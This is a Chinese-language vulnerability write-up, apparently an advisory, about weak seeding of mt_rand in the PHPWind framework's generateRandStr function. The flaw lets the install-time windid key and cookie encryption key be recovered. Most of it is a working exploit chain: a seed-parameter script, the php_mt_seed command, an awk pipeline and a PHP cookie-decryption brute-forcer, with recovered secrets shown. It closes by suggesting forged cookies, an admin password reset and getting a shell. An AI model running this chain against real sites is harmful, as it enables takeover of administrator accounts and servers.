- 发布时间:2017-05-10
- 公开时间:N/A
- 漏洞类型:信息泄露
- 危害等级:高
- 漏洞编号:xianzhi-2017-05-94591722
- 测试版本:N/A
漏洞详情
wind/utility/WindUtility.php 115行 generateRandStr函数
public static function generateRandStr($length) {
$mtstring = 'AzBy0CxDwEv1FuGtHs2IrJqK3pLoM4nNmOlP5kQjRi6ShTgU7fVeW8dXcY9bZa';
$randstr = '';
for ($i = 0; $i < $length; $i++) {
$randstr .= $mt_string[mt_rand(0, 61)];
}
return $randstr;
}
函数调用时没有用mt_srand初始化随机数种子 在已知序列且部分mt_rand值可知的情况下 可以爆破seeds 导致所有生成的“随机值”可被轻易计算
安装时有3处调用了generateRandStr函数 分别是
finishAction中的
$site_hash = WindUtility::generateRandStr(8);
$cookie_pre = WindUtility::generateRandStr(3);
和dataAction中的
$this->_writeWindid();//这个函数中调用如下
$key = md5(WindUtility::generateRandStr(10));
安装时抓包看调用顺序是data->finish
所以随机序列是
mt_rand()10 //$key windid通信密钥
mt_rand()8 //$site_hash cookie加解密DES密钥
mt_rand()3 //$cookie_pre cookie前缀
按这个顺序跑了一次php_mt_seeds没成功 看来安装的时候还有别的mt_rand调用 搜了一下 发现一个函数
private function _checkWriteAble($pathfile) {
if (!$pathfile) return false;
$isDir = in_array(substr($pathfile, -1), array('/', '\')) ? true : false;
if ($isDir) {
if (is_dir($pathfile)) {
mt_srand((double) microtime() 1000000);
$pathfile = $pathfile . 'pw' . uniqid(mt_rand()) . '.tmp';
} elseif (@mkdir($pathfile)) {
return self::_checkWriteAble($pathfile);
} else {
return false;
}
}
@chmod($pathfile, 0777);
$fp = @fopen($pathfile, 'ab');
if ($fp === false) return false;
fclose($fp);
$isDir && @unlink($pathfile);
return true;
}
函数是用来检查目录写权限的 可以看到当参数是目录的时候 会用mt_srand重置随机数 然后再调用了一次mt_rand()。
这个函数调用的地方不少 但我们不用去管它调用几次,因为只要参数是文件 就不会mt_srand也不会mt_rand
只要参数是目录 那么就会mt_srand()+mt_rand()
不管怎么调用这个函数 都只需要在最后计算序列时加上一次就可以了 而且因为这个函数的存在 使得我们的seeds范围大大减小(double)microtime()1000000
重新梳理逻辑
现在随机数序列是这样
[mt_srand(x)+mt_rand()]N
mt_rand()10 //$key windid通信密钥
mt_rand()8 //$site_hash cookie加解密DES密钥
mt_rand()3 //$cookie_pre cookie前缀
写个脚本来生成参数
$mt_string = 'AzBy0CxDwEv1FuGtHs2IrJqK3pLoM4nNmOlP5kQjRi6ShTgU7fVeW8dXcY9bZa';
$cookie_pre = 'JIE'; //cookie_pre
for($i=0;$i<19;$i++){ //1+10+8
echo "0 0 0 0 ";
}
for($i=0;$i<3;$i++){
$pos = strpos($mt_string,$cookie_pre[$i]);
echo "$pos $pos 0 61 ";
}
丢给php_mt_seeds
./php_mt_seed 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 21 21 0 61 19 19 0 61 9 9 0 61 >1.txt
因为只有3个已知值 所以跑出来的seeds会不少 不过因为前面用mt_srand自己置的seeds 所以在跑完
trying 0 - 33554431 之后就可以ctrl+c停止了
整理下文件
cat 1.txt | awk '{print $3}'|tr -s '\n' >seeds.txt
丢个下一个脚本
<?php
$cookie = urldecode('D%2BTThp3bRjrgqq5uut%2FcE%2FYuevs2Z6Gc%2BsFxOwpn%2BhETDbAPa1%2FTKA%3D%3D');
//登录后的cookie
$file = fopen("seeds.txt","rb");
$new_seeds = '';
while(!feof($file)){
$seed = fgets($file);
mt_srand(intval($seed));
$pad = mt_rand();
$key = generateRandStr(10);
$hash = generateRandStr(8);
$pre = generateRandStr(3);
if(check($cookie,$hash)){
die($seed.$hash."\n".md5($key));
}
}
function check($cookie,$hash){
if(decrypt($cookie,$hash)){
echo "result:".decrypt($cookie,$hash)."\n";
return true;
}else{
return false;
}
}
function decrypt($str, $key, $iv = '') {
$size = mcrypt_get_block_size(MCRYPT_DES, MCRYPT_MODE_CBC);
$iv = substr(md5($iv ? $iv : $key), -$size);
$str = base64_decode($str);
@$str = mcrypt_cbc(MCRYPT_DES, $key, $str, MCRYPT_DECRYPT, $iv);
$pad = ord($str{strlen($str) - 1});
if ($pad > strlen($str)) return false;
if (strspn($str, chr($pad), strlen($str) - $pad) != $pad) return false;
return substr($str, 0, -1 $pad);
}
分分钟出结果
result:2 44aef40f6b1629ffa04e8b2b24c12372
263450
Lw0xe4Vt
222abc490d4c50ccc7c07419ba501898
看看我们的配置文件
view.png
接下来 不管是拿hash去玩cookie
还是直接用windid玩用户 都随便 直接修改管理员密码进后台getshell都没什么问题
网友评论